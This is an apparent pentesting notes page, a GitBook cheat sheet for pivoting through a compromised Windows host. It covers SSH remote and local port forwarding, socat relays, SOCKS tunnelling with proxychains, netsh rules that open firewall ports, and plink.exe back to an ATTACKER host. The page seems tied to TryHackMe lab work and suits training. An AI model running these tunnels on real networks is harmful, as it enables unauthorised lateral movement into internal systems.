📖
sheepwall
  • Overview
  • Cloud Hacking
    • Azure
  • Hacking
    • Recon
      • Nmap
      • Website Recon
      • Service Enumeration
    • Exploitation
      • GraphQL
      • Application Attacks
      • Web Server Attacks
      • JSON attacks
      • CMS attacks
      • SQL Injection
      • Cross Site Scripting
      • Command Injection
      • SSRF
      • SSTI
      • Server Includes
      • XXE
      • WSDL/SOAP
      • Serialization Attacks
      • Cryptography
      • JWT
    • Installation
      • File Uploads
      • File Transfers
    • Actions on Objectives
      • Networking
      • Linux
    • Tools
    • Windows
      • 1. Getting Foothold
      • 2. Windows Exploitation
      • 3. Enumerating Active Directory
      • 4. Dumping Credentials
      • 5. Lateral Movement
      • 6. Persistence
      • 7. Active Directory
      • 8. LAPS
  • Bug Bounties
    • SSRF to Envoy Admin Page
    • Leaky Error Messages
    • HTTP verb tampering results in administrator role to the application
  • APT Information
    • DFIR Summary
Powered by GitBook
On this page
  • Port Forwarding for exploits
  • SSH Remote Port Forwarding
  • SSH Local Port Forwarding
  • Socat portforwarding
  • SOCKS
  • plink.exe
  1. Hacking
  2. Actions on Objectives

Networking

Port Forwarding for exploits

Attacker Machine -> Pivot Machine -> Victim Machine

SSH Remote Port Forwarding

On Pivot Machine, this forwards traffic from port 1234 on the attacker Machine to port 3389 on the Victim Machine

C:\\> ssh tunneluser@ATTCKER -R 3389:VICTIM:1234 -N

SSH Local Port Forwarding

On Pivot Machine, add the following firewall rules

netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80

On Pivot Machine, this forwards traffic from port 8001 on the attacker Machine to port 80 on the Pivot Machine

C:\\> ssh tunneluser@ATTACKER -L *:80:127.0.0.1:8001 -N

Socat portforwarding

On the Pivot Machine, add the following firewall rules

netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389

On the Pivot Machine, to forward the Attacker Machine to the Victim Machine

C:\\>socat TCP4-LISTEN:3389,fork TCP4:SERVER:3389

On Pivot Machine, to forward the Victim Machine to the Attacker Machine

C:\\>socat TCP4-LISTEN:80,fork TCP4:ATTACKER:80

SOCKS

On the Pivot Machine

C:\\> ssh tunneluser@ATTACKER -R 9050 -N

On the Attacker machine, setup proxychains under /etc/proxychains.conf

[ProxyList]
socks4  127.0.0.1 9050

On the Attacker Machine, prefix commands with proxychains to send traffic to port 9050, which is then forwarded to the Pivot Machine

$ proxychains curl <http://pxeboot.za.tryhackme.com>

plink.exe

  • Assuming you already have a shell on the victim machine, we can use plink.exe on the victim machine to forward traffic from the attacker machine to other internal networks in the victim network

> .\\plink.exe root@<attacker IP> -R <attacker port>:127.0.0.1:<victim port>

This creates a SSH connection to our attacker machine as root, and forwards any traffic from the attacker port to the victim port on 127.0.0.1

PreviousActions on ObjectivesNextLinux

Last updated 1 year ago